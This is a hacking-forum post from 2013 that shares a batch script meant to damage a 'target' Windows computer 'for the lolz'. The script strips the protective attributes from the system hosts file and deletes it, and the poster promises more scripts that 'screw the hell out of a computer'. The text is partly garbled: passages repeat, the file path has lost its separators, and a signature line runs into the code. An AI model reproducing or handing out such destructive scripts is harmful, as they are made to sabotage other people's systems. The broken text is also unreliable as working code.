Destroy internet applications (for the lolz) 12-27-2013, 03:52 AM
#1
So, this is my first thread
and to start it off, I thought I would start publishing my collection of batch and vbs programs (most screw the hell out of a computer) so here's the first one!
What it does:
1. finds the files it's looking for in the target's drivers
2. finds the hosts
3. deletes everything (muahaha :troll
Code:
WARNING: DO NOT USE ON YOUR OWN COMPUTER!!!!!
and to start it off, I thought I would start publishing my collection of batch and vbs programs (most screw the hell out of a computer) so here's the first one!What it does:
1. finds the files it's looking for in the target's drivers
2. finds the hosts
3. deletes everything (muahaha :troll

Code:
Code:
cls
@echo off
cd WINDOWSSYSTEM32DRIVERSETC
attrib hosts -r -h
del hostsIt's often the outcasts, the iconoclasts ... those who have the least to lose because they
don't have much in the first place, who feel the new currents and ride them the farthest.
don't have much in the first place, who feel the new currents and ride them the farthest.

















![[+]](https://sinister.li/images/modern/collapse_collapsed.png)
